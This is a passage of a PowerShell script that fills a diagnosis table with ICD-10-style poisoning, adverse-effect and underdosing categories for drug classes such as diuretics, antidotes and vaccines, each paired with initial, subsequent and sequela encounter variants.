$DiagnosisList.Rows.Add("Poisoning by unspecified topical agent, assault","Poisoning by unspecified topical agent, assault, sequela") + $null = $DiagnosisList.Rows.Add("Poisoning by unspecified topical agent, undetermined","Poisoning by unspecified topical agent, undetermined, initial encounter") + $null = $DiagnosisList.Rows.Add("Poisoning by unspecified topical agent, undetermined","Poisoning by unspecified topical agent, undetermined, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Poisoning by unspecified topical agent, undetermined","Poisoning by unspecified topical agent, undetermined, sequela") + $null = $DiagnosisList.Rows.Add("Adverse effect of unspecified topical agent","Adverse effect of unspecified topical agent, initial encounter") + $null = $DiagnosisList.Rows.Add("Adverse effect of unspecified topical agent","Adverse effect of unspecified topical agent, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Adverse effect of unspecified topical agent","Adverse effect of unspecified topical agent, sequela") + $null = $DiagnosisList.Rows.Add("Underdosing of unspecified topical agent","Underdosing of unspecified topical agent, initial encounter") + $null = $DiagnosisList.Rows.Add("Underdosing of unspecified topical agent","Underdosing of unspecified topical agent, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Underdosing of unspecified topical agent","Underdosing of unspecified topical agent, sequela") + $null = $DiagnosisList.Rows.Add("Poisoning by mineralocorticoids and their antagonists, accidental (unintentional)","Poisoning by mineralocorticoids and their antagonists, accidental (unintentional), initial encounter") + $null = $DiagnosisList.Rows.Add("Poisoning by mineralocorticoids and their antagonists, accidental (unintentional)","Poisoning by mineralocorticoids and their antagonists, accidental (unintentional), subsequent encounter") + $null = $DiagnosisList.Rows.Add("Poisoning by mineralocorticoids and their antagonists, accidental (unintentional)","Poisoning by mineralocorticoids and their antagonists, accidental (unintentional), sequela") + $null = $DiagnosisList.Rows.Add("Poisoning by mineralocorticoids and their antagonists, intentional self-harm","Poisoning by mineralocorticoids and their antagonists, intentional self-harm, initial encounter") + $null = $DiagnosisList.Rows.Add("Poisoning by mineralocorticoids and their antagonists, intentional self-harm","Poisoning by mineralocorticoids and their antagonists, intentional self-harm, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Poisoning by mineralocorticoids and their antagonists, intentional self-harm","Poisoning by mineralocorticoids and their antagonists, intentional self-harm, sequela") + $null = $DiagnosisList.Rows.Add("Poisoning by mineralocorticoids and their antagonists, assault","Poisoning by mineralocorticoids and their antagonists, assault, initial encounter") + $null = $DiagnosisList.Rows.Add("Poisoning by mineralocorticoids and their antagonists, assault","Poisoning by mineralocorticoids and their antagonists, assault, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Poisoning by mineralocorticoids and their antagonists, assault","Poisoning by mineralocorticoids and their antagonists, assault, sequela") + $null = $DiagnosisList.Rows.Add("Poisoning by mineralocorticoids and their antagonists, undetermined","Poisoning by mineralocorticoids and their antagonists, undetermined, initial encounter") + $null = $DiagnosisList.Rows.Add("Poisoning by mineralocorticoids and their antagonists, undetermined","Poisoning by mineralocorticoids and their antagonists, undetermined, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Poisoning by mineralocorticoids and their antagonists, undetermined","Poisoning by mineralocorticoids and their antagonists, undetermined, sequela") + $null = $DiagnosisList.Rows.Add("Adverse effect of mineralocorticoids and their antagonists","Adverse effect of mineralocorticoids and their antagonists, initial encounter") + $null = $DiagnosisList.Rows.Add("Adverse effect of mineralocorticoids and their antagonists","Adverse effect of mineralocorticoids and their antagonists, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Adverse effect of mineralocorticoids and their antagonists","Adverse effect of mineralocorticoids and their antagonists, sequela") + $null = $DiagnosisList.Rows.Add("Underdosing of mineralocorticoids and their antagonists","Underdosing of mineralocorticoids and their antagonists, initial encounter") + $null = $DiagnosisList.Rows.Add("Underdosing of mineralocorticoids and their antagonists","Underdosing of mineralocorticoids and their antagonists, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Underdosing of mineralocorticoids and their antagonists","Underdosing of mineralocorticoids and their antagonists, sequela") + $null = $DiagnosisList.Rows.Add("Poisoning by loop [high-ceiling] diuretics, accidental (unintentional)","Poisoning by loop [high-ceiling] diuretics, accidental (unintentional), initial encounter") + $null = $DiagnosisList.Rows.Add("Poisoning by loop [high-ceiling] diuretics, accidental (unintentional)","Poisoning by loop [high-ceiling] diuretics, accidental (unintentional), subsequent encounter") + $null = $DiagnosisList.Rows.Add("Poisoning by loop [high-ceiling] diuretics, accidental (unintentional)","Poisoning by loop [high-ceiling] diuretics, accidental (unintentional), sequela") + $null = $DiagnosisList.Rows.Add("Poisoning by loop [high-ceiling] diuretics, intentional self-harm","Poisoning by loop [high-ceiling] diuretics, intentional self-harm, initial encounter") + $null = $DiagnosisList.Rows.Add("Poisoning by loop [high-ceiling] diuretics, intentional self-harm","Poisoning by loop [high-ceiling] diuretics, intentional self-harm, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Poisoning by loop [high-ceiling] diuretics, intentional self-harm","Poisoning by loop [high-ceiling] diuretics, intentional self-harm, sequela") + $null = $DiagnosisList.Rows.Add("Poisoning by loop [high-ceiling] diuretics, assault","Poisoning by loop [high-ceiling] diuretics, assault, initial encounter") + $null = $DiagnosisList.Rows.Add("Poisoning by loop [high-ceiling] diuretics, assault","Poisoning by loop [high-ceiling] diuretics, assault, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Poisoning by loop [high-ceiling] diuretics, assault","Poisoning by loop [high-ceiling] diuretics, assault, sequela") + $null = $DiagnosisList.Rows.Add("Poisoning by loop [high-ceiling] diuretics, undetermined","Poisoning by loop [high-ceiling] diuretics, undetermined, initial encounter") + $null = $DiagnosisList.Rows.Add("Poisoning by loop [high-ceiling] diuretics, undetermined","Poisoning by loop [high-ceiling] diuretics, undetermined, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Poisoning by loop [high-ceiling] diuretics, undetermined","Poisoning by loop [high-ceiling] diuretics, undetermined, sequela") + $null = $DiagnosisList.Rows.Add("Adverse effect of loop [high-ceiling] diuretics","Adverse effect of loop [high-ceiling] diuretics, initial encounter") + $null = $DiagnosisList.Rows.Add("Adverse effect of loop [high-ceiling] diuretics","Adverse effect of loop [high-ceiling] diuretics, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Adverse effect of loop [high-ceiling] diuretics","Adverse effect of loop [high-ceiling] diuretics, sequela") + $null = $DiagnosisList.Rows.Add("Underdosing of loop [high-ceiling] diuretics","Underdosing of loop [high-ceiling] diuretics, initial encounter") + $null = $DiagnosisList.Rows.Add("Underdosing of loop [high-ceiling] diuretics","Underdosing of loop [high-ceiling] diuretics, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Underdosing of loop [high-ceiling] diuretics","Underdosing of loop [high-ceiling] diuretics, sequela") + $null = $DiagnosisList.Rows.Add("Poisoning by carbonic-anhydrase inhibitors, benzothiadiazides and other diuretics, accidental (unintentional)","Poisoning by carbonic-anhydrase inhibitors, benzothiadiazides and other diuretics, accidental (unintentional), initial encounter") + $null = $DiagnosisList.Rows.Add("Poisoning by carbonic-anhydrase inhibitors, benzothiadiazides and other diuretics, accidental (unintentional)","Poisoning by carbonic-anhydrase inhibitors, benzothiadiazides and other diuretics, accidental (unintentional), subsequent encounter") + $null = $DiagnosisList.Rows.Add("Poisoning by carbonic-anhydrase inhibitors, benzothiadiazides and other diuretics, accidental (unintentional)","Poisoning by carbonic-anhydrase inhibitors, benzothiadiazides and other diuretics, accidental (unintentional), sequela") + $null = $DiagnosisList.Rows.Add("Poisoning by carbonic-anhydrase inhibitors, benzothiadiazides and other diuretics, intentional self-harm","Poisoning by carbonic-anhydrase inhibitors, benzothiadiazides and other diuretics, intentional self-harm, initial encounter") + $null = $DiagnosisList.Rows.Add("Poisoning by carbonic-anhydrase inhibitors, benzothiadiazides and other diuretics, intentional self-harm","Poisoning by carbonic-anhydrase inhibitors, benzothiadiazides and other diuretics, intentional self-harm, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Poisoning by carbonic-anhydrase inhibitors, benzothiadiazides and other diuretics, intentional self-harm","Poisoning by carbonic-anhydrase inhibitors, benzothiadiazides and other diuretics, intentional self-harm, sequela") + $null = $DiagnosisList.Rows.Add("Poisoning by carbonic-anhydrase inhibitors, benzothiadiazides and other diuretics, assault","Poisoning by carbonic-anhydrase inhibitors, benzothiadiazides and other diuretics, assault, initial encounter") + $null = $DiagnosisList.Rows.Add("Poisoning by carbonic-anhydrase inhibitors, benzothiadiazides and other diuretics, assault","Poisoning by carbonic-anhydrase inhibitors, benzothiadiazides and other diuretics, assault, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Poisoning by carbonic-anhydrase inhibitors, benzothiadiazides and other diuretics, assault","Poisoning by carbonic-anhydrase inhibitors, benzothiadiazides and other diuretics, assault, sequela") + $null = $DiagnosisList.Rows.Add("Poisoning by carbonic-anhydrase inhibitors, benzothiadiazides and other diuretics, undetermined","Poisoning by carbonic-anhydrase inhibitors, benzothiadiazides and other diuretics, undetermined, initial encounter") + $null = $DiagnosisList.Rows.Add("Poisoning by carbonic-anhydrase inhibitors, benzothiadiazides and other diuretics, undetermined","Poisoning by carbonic-anhydrase inhibitors, benzothiadiazides and other diuretics, undetermined, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Poisoning by carbonic-anhydrase inhibitors, benzothiadiazides and other diuretics, undetermined","Poisoning by carbonic-anhydrase inhibitors, benzothiadiazides and other diuretics, undetermined, sequela") + $null = $DiagnosisList.Rows.Add("Adverse effect of carbonic-anhydrase inhibitors, benzothiadiazides and other diuretics","Adverse effect of carbonic-anhydrase inhibitors, benzothiadiazides and other diuretics, initial encounter") + $null = $DiagnosisList.Rows.Add("Adverse effect of carbonic-anhydrase inhibitors, benzothiadiazides and other diuretics","Adverse effect of carbonic-anhydrase inhibitors, benzothiadiazides and other diuretics, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Adverse effect of carbonic-anhydrase inhibitors, benzothiadiazides and other diuretics","Adverse effect of carbonic-anhydrase inhibitors, benzothiadiazides and other diuretics, sequela") + $null = $DiagnosisList.Rows.Add("Underdosing of carbonic-anhydrase inhibitors, benzothiadiazides and other diuretics","Underdosing of carbonic-anhydrase inhibitors, benzothiadiazides and other diuretics, initial encounter") + $null = $DiagnosisList.Rows.Add("Underdosing of carbonic-anhydrase inhibitors, benzothiadiazides and other diuretics","Underdosing of carbonic-anhydrase inhibitors, benzothiadiazides and other diuretics, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Underdosing of carbonic-anhydrase inhibitors, benzothiadiazides and other diuretics","Underdosing of carbonic-anhydrase inhibitors, benzothiadiazides and other diuretics, sequela") + $null = $DiagnosisList.Rows.Add("Poisoning by electrolytic, caloric and water-balance agents, accidental (unintentional)","Poisoning by electrolytic, caloric and water-balance agents, accidental (unintentional), initial encounter") + $null = $DiagnosisList.Rows.Add("Poisoning by electrolytic, caloric and water-balance agents, accidental (unintentional)","Poisoning by electrolytic, caloric and water-balance agents, accidental (unintentional), subsequent encounter") + $null = $DiagnosisList.Rows.Add("Poisoning by electrolytic, caloric and water-balance agents, accidental (unintentional)","Poisoning by electrolytic, caloric and water-balance agents, accidental (unintentional), sequela") + $null = $DiagnosisList.Rows.Add("Poisoning by electrolytic, caloric and water-balance agents, intentional self-harm","Poisoning by electrolytic, caloric and water-balance agents, intentional self-harm, initial encounter") + $null = $DiagnosisList.Rows.Add("Poisoning by electrolytic, caloric and water-balance agents, intentional self-harm","Poisoning by electrolytic, caloric and water-balance agents, intentional self-harm, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Poisoning by electrolytic, caloric and water-balance agents, intentional self-harm","Poisoning by electrolytic, caloric and water-balance agents, intentional self-harm, sequela") + $null = $DiagnosisList.Rows.Add("Poisoning by electrolytic, caloric and water-balance agents, assault","Poisoning by electrolytic, caloric and water-balance agents, assault, initial encounter") + $null = $DiagnosisList.Rows.Add("Poisoning by electrolytic, caloric and water-balance agents, assault","Poisoning by electrolytic, caloric and water-balance agents, assault, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Poisoning by electrolytic, caloric and water-balance agents, assault","Poisoning by electrolytic, caloric and water-balance agents, assault, sequela") + $null = $DiagnosisList.Rows.Add("Poisoning by electrolytic, caloric and water-balance agents, undetermined","Poisoning by electrolytic, caloric and water-balance agents, undetermined, initial encounter") + $null = $DiagnosisList.Rows.Add("Poisoning by electrolytic, caloric and water-balance agents, undetermined","Poisoning by electrolytic, caloric and water-balance agents, undetermined, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Poisoning by electrolytic, caloric and water-balance agents, undetermined","Poisoning by electrolytic, caloric and water-balance agents, undetermined, sequela") + $null = $DiagnosisList.Rows.Add("Adverse effect of electrolytic, caloric and water-balance agents","Adverse effect of electrolytic, caloric and water-balance agents, initial encounter") + $null = $DiagnosisList.Rows.Add("Adverse effect of electrolytic, caloric and water-balance agents","Adverse effect of electrolytic, caloric and water-balance agents, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Adverse effect of electrolytic, caloric and water-balance agents","Adverse effect of electrolytic, caloric and water-balance agents, sequela") + $null = $DiagnosisList.Rows.Add("Underdosing of electrolytic, caloric and water-balance agents","Underdosing of electrolytic, caloric and water-balance agents, initial encounter") + $null = $DiagnosisList.Rows.Add("Underdosing of electrolytic, caloric and water-balance agents","Underdosing of electrolytic, caloric and water-balance agents, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Underdosing of electrolytic, caloric and water-balance agents","Underdosing of electrolytic, caloric and water-balance agents, sequela") + $null = $DiagnosisList.Rows.Add("Poisoning by drugs affecting uric acid metabolism, accidental (unintentional)","Poisoning by drugs affecting uric acid metabolism, accidental (unintentional), initial encounter") + $null = $DiagnosisList.Rows.Add("Poisoning by drugs affecting uric acid metabolism, accidental (unintentional)","Poisoning by drugs affecting uric acid metabolism, accidental (unintentional), subsequent encounter") + $null = $DiagnosisList.Rows.Add("Poisoning by drugs affecting uric acid metabolism, accidental (unintentional)","Poisoning by drugs affecting uric acid metabolism, accidental (unintentional), sequela") + $null = $DiagnosisList.Rows.Add("Poisoning by drugs affecting uric acid metabolism, intentional self-harm","Poisoning by drugs affecting uric acid metabolism, intentional self-harm, initial encounter") + $null = $DiagnosisList.Rows.Add("Poisoning by drugs affecting uric acid metabolism, intentional self-harm","Poisoning by drugs affecting uric acid metabolism, intentional self-harm, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Poisoning by drugs affecting uric acid metabolism, intentional self-harm","Poisoning by drugs affecting uric acid metabolism, intentional self-harm, sequela") + $null = $DiagnosisList.Rows.Add("Poisoning by drugs affecting uric acid metabolism, assault","Poisoning by drugs affecting uric acid metabolism, assault, initial encounter") + $null = $DiagnosisList.Rows.Add("Poisoning by drugs affecting uric acid metabolism, assault","Poisoning by drugs affecting uric acid metabolism, assault, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Poisoning by drugs affecting uric acid metabolism, assault","Poisoning by drugs affecting uric acid metabolism, assault, sequela") + $null = $DiagnosisList.Rows.Add("Poisoning by drugs affecting uric acid metabolism, undetermined","Poisoning by drugs affecting uric acid metabolism, undetermined, initial encounter") + $null = $DiagnosisList.Rows.Add("Poisoning by drugs affecting uric acid metabolism, undetermined","Poisoning by drugs affecting uric acid metabolism, undetermined, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Poisoning by drugs affecting uric acid metabolism, undetermined","Poisoning by drugs affecting uric acid metabolism, undetermined, sequela") + $null = $DiagnosisList.Rows.Add("Adverse effect of drugs affecting uric acid metabolism","Adverse effect of drugs affecting uric acid metabolism, initial encounter") + $null = $DiagnosisList.Rows.Add("Adverse effect of drugs affecting uric acid metabolism","Adverse effect of drugs affecting uric acid metabolism, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Adverse effect of drugs affecting uric acid metabolism","Adverse effect of drugs affecting uric acid metabolism, sequela") + $null = $DiagnosisList.Rows.Add("Underdosing of drugs affecting uric acid metabolism","Underdosing of drugs affecting uric acid metabolism, initial encounter") + $null = $DiagnosisList.Rows.Add("Underdosing of drugs affecting uric acid metabolism","Underdosing of drugs affecting uric acid metabolism, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Underdosing of drugs affecting uric acid metabolism","Underdosing of drugs affecting uric acid metabolism, sequela") + $null = $DiagnosisList.Rows.Add("Poisoning by appetite depressants, accidental (unintentional)","Poisoning by appetite depressants, accidental (unintentional), initial encounter") + $null = $DiagnosisList.Rows.Add("Poisoning by appetite depressants, accidental (unintentional)","Poisoning by appetite depressants, accidental (unintentional), subsequent encounter") + $null = $DiagnosisList.Rows.Add("Poisoning by appetite depressants, accidental (unintentional)","Poisoning by appetite depressants, accidental (unintentional), sequela") + $null = $DiagnosisList.Rows.Add("Poisoning by appetite depressants, intentional self-harm","Poisoning by appetite depressants, intentional self-harm, initial encounter") + $null = $DiagnosisList.Rows.Add("Poisoning by appetite depressants, intentional self-harm","Poisoning by appetite depressants, intentional self-harm, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Poisoning by appetite depressants, intentional self-harm","Poisoning by appetite depressants, intentional self-harm, sequela") + $null = $DiagnosisList.Rows.Add("Poisoning by appetite depressants, assault","Poisoning by appetite depressants, assault, initial encounter") + $null = $DiagnosisList.Rows.Add("Poisoning by appetite depressants, assault","Poisoning by appetite depressants, assault, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Poisoning by appetite depressants, assault","Poisoning by appetite depressants, assault, sequela") + $null = $DiagnosisList.Rows.Add("Poisoning by appetite depressants, undetermined","Poisoning by appetite depressants, undetermined, initial encounter") + $null = $DiagnosisList.Rows.Add("Poisoning by appetite depressants, undetermined","Poisoning by appetite depressants, undetermined, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Poisoning by appetite depressants, undetermined","Poisoning by appetite depressants, undetermined, sequela") + $null = $DiagnosisList.Rows.Add("Adverse effect of appetite depressants","Adverse effect of appetite depressants, initial encounter") + $null = $DiagnosisList.Rows.Add("Adverse effect of appetite depressants","Adverse effect of appetite depressants, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Adverse effect of appetite depressants","Adverse effect of appetite depressants, sequela") + $null = $DiagnosisList.Rows.Add("Underdosing of appetite depressants","Underdosing of appetite depressants, initial encounter") + $null = $DiagnosisList.Rows.Add("Underdosing of appetite depressants","Underdosing of appetite depressants, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Underdosing of appetite depressants","Underdosing of appetite depressants, sequela") + $null = $DiagnosisList.Rows.Add("Poisoning by antidotes and chelating agents, accidental (unintentional)","Poisoning by antidotes and chelating agents, accidental (unintentional), initial encounter") + $null = $DiagnosisList.Rows.Add("Poisoning by antidotes and chelating agents, accidental (unintentional)","Poisoning by antidotes and chelating agents, accidental (unintentional), subsequent encounter") + $null = $DiagnosisList.Rows.Add("Poisoning by antidotes and chelating agents, accidental (unintentional)","Poisoning by antidotes and chelating agents, accidental (unintentional), sequela") + $null = $DiagnosisList.Rows.Add("Poisoning by antidotes and chelating agents, intentional self-harm","Poisoning by antidotes and chelating agents, intentional self-harm, initial encounter") + $null = $DiagnosisList.Rows.Add("Poisoning by antidotes and chelating agents, intentional self-harm","Poisoning by antidotes and chelating agents, intentional self-harm, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Poisoning by antidotes and chelating agents, intentional self-harm","Poisoning by antidotes and chelating agents, intentional self-harm, sequela") + $null = $DiagnosisList.Rows.Add("Poisoning by antidotes and chelating agents, assault","Poisoning by antidotes and chelating agents, assault, initial encounter") + $null = $DiagnosisList.Rows.Add("Poisoning by antidotes and chelating agents, assault","Poisoning by antidotes and chelating agents, assault, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Poisoning by antidotes and chelating agents, assault","Poisoning by antidotes and chelating agents, assault, sequela") + $null = $DiagnosisList.Rows.Add("Poisoning by antidotes and chelating agents, undetermined","Poisoning by antidotes and chelating agents, undetermined, initial encounter") + $null = $DiagnosisList.Rows.Add("Poisoning by antidotes and chelating agents, undetermined","Poisoning by antidotes and chelating agents, undetermined, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Poisoning by antidotes and chelating agents, undetermined","Poisoning by antidotes and chelating agents, undetermined, sequela") + $null = $DiagnosisList.Rows.Add("Adverse effect of antidotes and chelating agents","Adverse effect of antidotes and chelating agents, initial encounter") + $null = $DiagnosisList.Rows.Add("Adverse effect of antidotes and chelating agents","Adverse effect of antidotes and chelating agents, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Adverse effect of antidotes and chelating agents","Adverse effect of antidotes and chelating agents, sequela") + $null = $DiagnosisList.Rows.Add("Underdosing of antidotes and chelating agents","Underdosing of antidotes and chelating agents, initial encounter") + $null = $DiagnosisList.Rows.Add("Underdosing of antidotes and chelating agents","Underdosing of antidotes and chelating agents, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Underdosing of antidotes and chelating agents","Underdosing of antidotes and chelating agents, sequela") + $null = $DiagnosisList.Rows.Add("Poisoning by analeptics and opioid receptor antagonists, accidental (unintentional)","Poisoning by analeptics and opioid receptor antagonists, accidental (unintentional), initial encounter") + $null = $DiagnosisList.Rows.Add("Poisoning by analeptics and opioid receptor antagonists, accidental (unintentional)","Poisoning by analeptics and opioid receptor antagonists, accidental (unintentional), subsequent encounter") + $null = $DiagnosisList.Rows.Add("Poisoning by analeptics and opioid receptor antagonists, accidental (unintentional)","Poisoning by analeptics and opioid receptor antagonists, accidental (unintentional), sequela") + $null = $DiagnosisList.Rows.Add("Poisoning by analeptics and opioid receptor antagonists, intentional self-harm","Poisoning by analeptics and opioid receptor antagonists, intentional self-harm, initial encounter") + $null = $DiagnosisList.Rows.Add("Poisoning by analeptics and opioid receptor antagonists, intentional self-harm","Poisoning by analeptics and opioid receptor antagonists, intentional self-harm, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Poisoning by analeptics and opioid receptor antagonists, intentional self-harm","Poisoning by analeptics and opioid receptor antagonists, intentional self-harm, sequela") + $null = $DiagnosisList.Rows.Add("Poisoning by analeptics and opioid receptor antagonists, assault","Poisoning by analeptics and opioid receptor antagonists, assault, initial encounter") + $null = $DiagnosisList.Rows.Add("Poisoning by analeptics and opioid receptor antagonists, assault","Poisoning by analeptics and opioid receptor antagonists, assault, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Poisoning by analeptics and opioid receptor antagonists, assault","Poisoning by analeptics and opioid receptor antagonists, assault, sequela") + $null = $DiagnosisList.Rows.Add("Poisoning by analeptics and opioid receptor antagonists, undetermined","Poisoning by analeptics and opioid receptor antagonists, undetermined, initial encounter") + $null = $DiagnosisList.Rows.Add("Poisoning by analeptics and opioid receptor antagonists, undetermined","Poisoning by analeptics and opioid receptor antagonists, undetermined, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Poisoning by analeptics and opioid receptor antagonists, undetermined","Poisoning by analeptics and opioid receptor antagonists, undetermined, sequela") + $null = $DiagnosisList.Rows.Add("Adverse effect of analeptics and opioid receptor antagonists","Adverse effect of analeptics and opioid receptor antagonists, initial encounter") + $null = $DiagnosisList.Rows.Add("Adverse effect of analeptics and opioid receptor antagonists","Adverse effect of analeptics and opioid receptor antagonists, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Adverse effect of analeptics and opioid receptor antagonists","Adverse effect of analeptics and opioid receptor antagonists, sequela") + $null = $DiagnosisList.Rows.Add("Underdosing of analeptics and opioid receptor antagonists","Underdosing of analeptics and opioid receptor antagonists, initial encounter") + $null = $DiagnosisList.Rows.Add("Underdosing of analeptics and opioid receptor antagonists","Underdosing of analeptics and opioid receptor antagonists, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Underdosing of analeptics and opioid receptor antagonists","Underdosing of analeptics and opioid receptor antagonists, sequela") + $null = $DiagnosisList.Rows.Add("Poisoning by diagnostic agents, accidental (unintentional)","Poisoning by diagnostic agents, accidental (unintentional), initial encounter") + $null = $DiagnosisList.Rows.Add("Poisoning by diagnostic agents, accidental (unintentional)","Poisoning by diagnostic agents, accidental (unintentional), subsequent encounter") + $null = $DiagnosisList.Rows.Add("Poisoning by diagnostic agents, accidental (unintentional)","Poisoning by diagnostic agents, accidental (unintentional), sequela") + $null = $DiagnosisList.Rows.Add("Poisoning by diagnostic agents, intentional self-harm","Poisoning by diagnostic agents, intentional self-harm, initial encounter") + $null = $DiagnosisList.Rows.Add("Poisoning by diagnostic agents, intentional self-harm","Poisoning by diagnostic agents, intentional self-harm, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Poisoning by diagnostic agents, intentional self-harm","Poisoning by diagnostic agents, intentional self-harm, sequela") + $null = $DiagnosisList.Rows.Add("Poisoning by diagnostic agents, assault","Poisoning by diagnostic agents, assault, initial encounter") + $null = $DiagnosisList.Rows.Add("Poisoning by diagnostic agents, assault","Poisoning by diagnostic agents, assault, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Poisoning by diagnostic agents, assault","Poisoning by diagnostic agents, assault, sequela") + $null = $DiagnosisList.Rows.Add("Poisoning by diagnostic agents, undetermined","Poisoning by diagnostic agents, undetermined, initial encounter") + $null = $DiagnosisList.Rows.Add("Poisoning by diagnostic agents, undetermined","Poisoning by diagnostic agents, undetermined, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Poisoning by diagnostic agents, undetermined","Poisoning by diagnostic agents, undetermined, sequela") + $null = $DiagnosisList.Rows.Add("Adverse effect of diagnostic agents","Adverse effect of diagnostic agents, initial encounter") + $null = $DiagnosisList.Rows.Add("Adverse effect of diagnostic agents","Adverse effect of diagnostic agents, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Adverse effect of diagnostic agents","Adverse effect of diagnostic agents, sequela") + $null = $DiagnosisList.Rows.Add("Underdosing of diagnostic agents","Underdosing of diagnostic agents, initial encounter") + $null = $DiagnosisList.Rows.Add("Underdosing of diagnostic agents","Underdosing of diagnostic agents, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Underdosing of diagnostic agents","Underdosing of diagnostic agents, sequela") + $null = $DiagnosisList.Rows.Add("Poisoning by pertussis vaccine, including combinations with a pertussis component, accidental (unintentional)","Poisoning by pertussis vaccine, including combinations with a pertussis component, accidental (unintentional), initial encounter") + $null = $DiagnosisList.Rows.Add("Poisoning by pertussis vaccine, including combinations with a pertussis component, accidental (unintentional)","Poisoning by pertussis vaccine, including combinations with a pertussis component, accidental (unintentional), subsequent encounter") + $null = $DiagnosisList.Rows.Add("Poisoning by pertussis vaccine, including combinations with a pertussis component, accidental (unintentional)","Poisoning by pertussis vaccine, including combinations with a pertussis component, accidental (unintentional), sequela") + $null = $DiagnosisList.Rows.Add("Poisoning by pertussis vaccine, including combinations with a pertussis component, intentional self-harm","Poisoning by pertussis vaccine, including combinations with a pertussis component, intentional self-harm, initial encounter") + $null = $DiagnosisList.Rows.Add("Poisoning by pertussis vaccine, including combinations with a pertussis component, intentional self-harm","Poisoning by pertussis vaccine, including combinations with a pertussis component, intentional self-harm, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Poisoning by pertussis vaccine, including combinations with a pertussis component, intentional self-harm","Poisoning by pertussis vaccine, including combinations with a pertussis component, intentional self-harm, sequela") + $null = $DiagnosisList.Rows.Add("Poisoning by pertussis vaccine, including combinations with a pertussis component, assault","Poisoning by pertussis vaccine, including combinations with a pertussis component, assault, initial encounter") + $null = $DiagnosisList.Rows.Add("Poisoning by pertussis vaccine, including combinations with a pertussis component, assault","Poisoning by pertussis vaccine, including combinations with a pertussis component, assault, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Poisoning by pertussis vaccine, including combinations with a pertussis component, assault","Poisoning by pertussis vaccine, including combinations with a pertussis component, assault, sequela") + $null = $DiagnosisList.Rows.Add("Poisoning by pertussis vaccine, including combinations with a pertussis component, undetermined","Poisoning by pertussis vaccine, including combinations with a pertussis component, undetermined, initial encounter") + $null = $DiagnosisList.Rows.Add("Poisoning by pertussis vaccine, including combinations with a pertussis component, undetermined","Poisoning by pertussis vaccine, including combinations with a pertussis component, undetermined, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Poisoning by pertussis vaccine, including combinations with a pertussis component, undetermined","Poisoning by pertussis vaccine, including combinations with a pertussis component, undetermined, sequela") + $null = $DiagnosisList.Rows.Add("Adverse effect of pertussis vaccine, including combinations with a pertussis component","Adverse effect of pertussis vaccine, including combinations with a pertussis component, initial encounter") + $null = $DiagnosisList.Rows.Add("Adverse effect of pertussis vaccine, including combinations with a pertussis component","Adverse effect of pertussis vaccine, including combinations with a pertussis component, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Adverse effect of pertussis vaccine, including combinations with a pertussis component","Adverse effect of pertussis vaccine, including combinations with a pertussis component, sequela") + $null = $DiagnosisList.Rows.Add("Underdosing of pertussis vaccine, including combinations with a pertussis component","Underdosing of pertussis vaccine, including combinations with a pertussis component, initial encounter") + $null = $DiagnosisList.Rows.Add("Underdosing of pertussis vaccine, including combinations with a pertussis component","Underdosing of pertussis vaccine, including combinations with a pertussis component, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Underdosing of pertussis vaccine, including combinations with a pertussis component","Underdosing of pertussis vaccine, including combinations with a pertussis component, sequela") + $null = $DiagnosisList.Rows.Add("Poisoning by mixed bacterial vaccines without a pertussis component, accidental (unintentional)","Poisoning by mixed bacterial vaccines without a pertussis component, accidental (unintentional), initial encounter") + $null = $DiagnosisList.Rows.Add("Poisoning by mixed bacterial vaccines without a pertussis component, accidental (unintentional)","Poisoning by mixed bacterial vaccines without a pertussis component, accidental (unintentional), subsequent encounter") + $null = $DiagnosisList.Rows.Add("Poisoning by mixed bacterial vaccines without a pertussis component, accidental (unintentional)","Poisoning by mixed bacterial vaccines without a pertussis component, accidental (unintentional), sequela") + $null = $DiagnosisList.Rows.Add("Poisoning by mixed bacterial vaccines without a pertussis component, intentional self-harm","Poisoning by mixed bacterial vaccines without a 